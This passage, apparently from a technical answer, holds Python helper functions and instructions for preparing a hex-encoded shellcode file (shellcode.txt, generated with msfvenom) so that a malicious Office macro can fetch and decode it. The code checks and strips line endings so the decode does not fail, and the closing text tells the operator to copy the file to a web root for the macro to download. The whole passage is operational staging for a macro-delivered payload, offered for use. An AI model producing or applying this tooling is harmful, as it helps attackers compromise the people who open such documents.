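    dropped, whereas a pair that is not two hex digits (e.g. a trailing CR LF)
    has no byte value for CByte("&H" & pair) to produce and the macro does not
    decode the file cleanly. ValueError stands in for that failure.
    """
    out = bytearray()
    for i in range(len(text) // 2):
        pair = text[2 * i:2 * i + 2]
        if not HEX_PAIR.fullmatch(pair):
            raise ValueError(f"pair {i} is {pair!r}, not two hex digits")
        out.append(int(pair, 16))
    return bytes(out)


def macro_can_decode(text: str) -> bool:
    """True if the macro's decoder would get through the whole file."""
    try:
        decode_like_macro(text)
    except ValueError:
        return False
    return True


def check_payload_file(text: str) -> dict:
    """Report what an operator should fix before hosting shellcode.txt."""
    digits = re.sub(r"\s+", "", text)
    problems = []
    if digits != text:
        problems.append("whitespace or line endings present (strip them; a CR LF would land inside a pair)")
    if len(digits) % 2:
        problems.append("odd number of hex digits (the macro silently drops the last one)")
    if not re.fullmatch(r"[0-9A-Fa-f]*", digits):
        problems.append("non-hex characters present")
    return {
        "bytes": len(digits) // 2,
        "macro_can_decode": macro_can_decode(text),
        "problems": problems,
    }


def normalize_payload_file(text: str) -> str:
    """Strip anything an editor or transfer added, so the served file is
    exactly the byte-pair stream the macro expects."""
    return re.sub(r"\s+", "", text).lower()


if __name__ == "__main__":
    hexfile = to_hex_file(SAMPLE_SHELLCODE)
    print(hexfile, check_payload_file(hexfile))
    # A lone LF is tolerated by the macro; a CR LF ending is not.
    print(check_payload_file(hexfile + "\n"))
    print(check_payload_file(hexfile + "\r\n"))
    print(normalize_payload_file(hexfile + "\r\n") == hexfile)
```

Run it against the real shellcode.txt (`check_payload_file(open("shellcode.txt").read())`) before copying the file to the web root; if `problems` is non-empty, write back `normalize_payload_file(...)` and re-check, and compare `bytes` with the size msfvenom reported.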